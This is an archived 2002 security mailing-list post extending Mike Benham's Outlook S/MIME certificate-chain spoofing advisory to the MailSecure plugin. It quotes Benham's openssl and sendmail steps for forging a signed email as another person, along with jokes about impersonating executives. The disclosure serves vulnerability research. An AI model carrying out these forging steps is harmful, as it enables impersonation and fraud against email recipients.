There's more to it than just Outlook. Baltimore's MailSecure, an Outlook plugin which (among other things) verifies S/MIME certs, is also vulnerable to this problem. Certificates issued by "middle men" appear in MailSecure's certificate information as having "inherited trust". However, MailSecure usually displays a "new certificate" information, containing the CN of the certificate's owner. In this case, 2 new certificates show up (the spoofed person's name, and the middle man's name), and the end user may find it odd to see 2 names in there (unless the middle man is someone the "victim" already knew, and the name won't show up because it isn't new). Severity: - There are reasonable means of being "caught" if you're dealing with people who don't know you (or trust you), because your name will show up in there (assuming you're using your own cert as the issuer) - In closed (corporate) environments, it may get more serious. You can e-mail a colleague as if you were the CEO, and "fire" him ;-) Exploit: - The same technique explained by Mike Benham for Outlook works here. Vendor Notification: - Local representative notified today. On Mon, 2002-09-02 at 18:37, Mike Benham wrote: > > ======================================================================= > Outlook S/MIME Vulnerability 09/02/02 > Mike Benham <moxieat_private> > http://www.thoughtcrime.org > > ======================================================================= > Abstract > > Outlook's S/MIME implementation is vulnerable to the certificate chain > spoofing attack, despite Microsoft's claim that IE is the only affected > application. The vulnerability allows anyone to forge the digital > signature on an email that is to be viewed with Outlook. No warnings are > given, no dialogs are shown. > > ======================================================================== > Description > > For a complete description of the certificate chain attack, see: > http://online.securityfocus.com/archive/1/286290 > > As with the IE SSL vulnerability, an attacker generates a bad certificate > chain: > > [Issuer:VeriSign | Subject:VeriSign] > >[Issuer:VeriSign | Subject:www.thoughtcrime.org] > >[Issuer:www.thoughtcrime.org | Subject:Bill Gates/billgatesat_private] > > Outlook fails to check the Basic Constraints on the intermediate > certificate and accepts the leaf certificate as valid. > > ========================================================================= > Severity > > As it stands, there is virtually no difference between signed and unsigned > email in Outlook. Unless carefully inspected, signed email in Outlook is > essentially meaningless. This also applies to any signed email received > over the past 5+ years. > > Prudent users who must continue using Outlook for signed email should > manually inspect and verify received certificate chains. > > ======================================================================== > Affected Clients > > Mozilla is NOT vulnerable. > > Outlook Express 5 is vulnerable. > (Tested on fully patched Win2k SP3 system) > > ======================================================================== > Exploit > > 1) Put a valid CA-signed certificate and private key in a file > "middle.pem" > > (If you don't have a valid CA-signed certificate, there's one bundled with > sslsniff: http://www.thoughtcrime.org/ie.html) > > 2) Generate a fake leaf certificate signing request: > > a) openssl genrsa -out key.pem 1024 > b) openssl req -new -key key.pem -out leaf.csr > > 3) Sign the CSR with your "intermediate" certificate: > > a) openssl x509 -req -in leaf.csr -CA middle.pem -CAkey middle.pem > -CAcreateserial -out leaf.pem > > 4) Sign a spoofed mail message: > > a) openssl smime -sign -in mail.txt -text -out mail.msg -signer leaf.pem > -inkey key.pem -certfile middle.pem -from billgatesat_private -to > whomeverat_private -subject "SM Exploit" > > 5) Send the mail: > > a) cat mail.msg | sendmail whomeverat_private > > I encourage everyone to send Bill Gates an email from himself. =) > > ========================================================================== > Vendor Notification Status > > Microsoft knows about this, of course, but "isn't even sure whether to > call this a 'vulnerability'." Right. > > - Mike > > -- > http://www.thoughtcrime.org > > > > -- Spyder <spyderat_private>
This archive was generated by hypermail 2b30 : Tue Sep 03 2002 - 09:20:20 PDT